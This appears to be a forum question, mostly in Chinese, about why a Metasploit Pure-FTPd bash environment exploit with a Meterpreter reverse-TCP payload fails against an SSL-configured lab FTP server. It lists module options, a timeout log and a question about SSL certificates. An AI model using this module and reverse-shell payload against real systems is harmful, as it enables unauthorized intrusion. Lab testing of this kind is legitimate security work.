我正在使用 Metasploit 对使用 FTP 服务器的实验室进行渗透测试。客户端能够连接到 FTP 服务器并进行身份验证。但是,我的漏洞利用无法做到。
FTP Server:
* Ubuntu 20.4
* Pure-FTPd
* Configured to use SSL/TLS
Client:
* Ubuntu 20.4
* [set ftp:ssl-force true] used to enable SSL
* [telnet <ftp-server-ip> 21] used to connect to FTP server
Metasploit 模块选项:
Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS <ftp-server-ip> yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
oit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 21 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local ma
chine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST <msf-server-ip> yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
在 Metasploit 中,当我将SSL设置设置为 时true,我收到一条警告说[!] Changing the SSL option's value may require changing RPORT!。我尝试将其更改为443,但是当我运行漏洞利用程序时,我得到以下信息:
[*] Started reverse TCP handler on <msf-server-ip>:4444
[-] <ftp-server-ip>:443 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (<ftp-server-ip>:443) timed out.
[*] Exploit completed, but no session was created.
我的猜测是我需要更改 SSLCert 设置,但如果我使用该set ftp:ssl-force true命令,我应该将 SSLCert 设置为什么路径?